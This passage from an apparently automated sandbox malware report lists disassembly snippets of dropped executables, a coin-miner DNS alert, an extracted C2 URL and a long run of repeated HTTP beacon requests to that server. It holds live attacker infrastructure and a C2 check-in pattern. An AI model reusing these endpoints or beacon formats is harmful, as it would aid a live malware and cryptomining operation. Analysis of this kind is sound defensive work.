rn,_invalid_parameter_noinfo_noreturn,3_2_00007FF7AB4BB190
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX0\rolex.exeCode function: 3_2_00007FF7AB4CFCA0 FindFirstFileExA,3_2_00007FF7AB4CFCA0
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4x nop then jmp 013F13B6h4_2_013F1248
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4x nop then jmp 013F331Ch4_2_013F2E9E
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_013F059C
                  Source: C:\Users\user\AppData\Local\Temp\RarSFX1\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h4_2_013F0CE0
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then jmp 00C72D7Ch12_2_00C728FE
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h12_2_00C70CE7
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h12_2_00C7059C
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then jmp 00C713B6h12_2_00C71251
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then jmp 02FD2F4Ch16_2_02FD2ACE
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then jmp 02FD13B6h16_2_02FD1248
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h16_2_02FD0CE0
                  Source: C:\Users\user\AppData\Roaming\Sysfiles\yondex.exeCode function: 4x nop then cmp dword ptr [ebp-20h], 00000000h16_2_02FD059C

                  Networking

                  barindex
                  Snort IDS alert for network traffic
                  Source: TrafficSnort IDS: 2047928 ET TROJAN CoinMiner Domain in DNS Lookup (pool .supportxmr .com) 192.168.2.4:49698 -> 1.1.1.1:53
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://cv99160.tw1.ru/cmd.php
                  Source: global trafficTCP traffic: 192.168.2.4:49732 -> 141.94.96.144:3333
                  Source: global trafficTCP traffic: 192.168.2.4:49825 -> 141.94.96.195:3333
                  Source: global trafficTCP traffic: 192.168.2.4:49843 -> 141.94.96.71:3333
                  Source: Joe Sandbox ViewIP Address: 141.94.96.195 141.94.96.195
                  Source: Joe Sandbox ViewIP Address: 92.53.96.121 92.53.96.121
                  Source: Joe Sandbox ViewIP Address: 141.94.96.71 141.94.96.71
                  Source: Joe Sandbox ViewIP Address: 141.94.96.144 141.94.96.144
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewASN Name: TIMEWEB-ASRU TIMEWEB-ASRU
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewASN Name: DFNVereinzurFoerderungeinesDeutschenForschungsnetzese DFNVereinzurFoerderungeinesDeutschenForschungsnetzese
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /cmd.php?timeout=1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ru
                  Source: global trafficHTTP traffic detected: GET /cmd.php?hwid=B81A4609 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0Host: cv99160.tw1.ruConnection: Keep-Alive
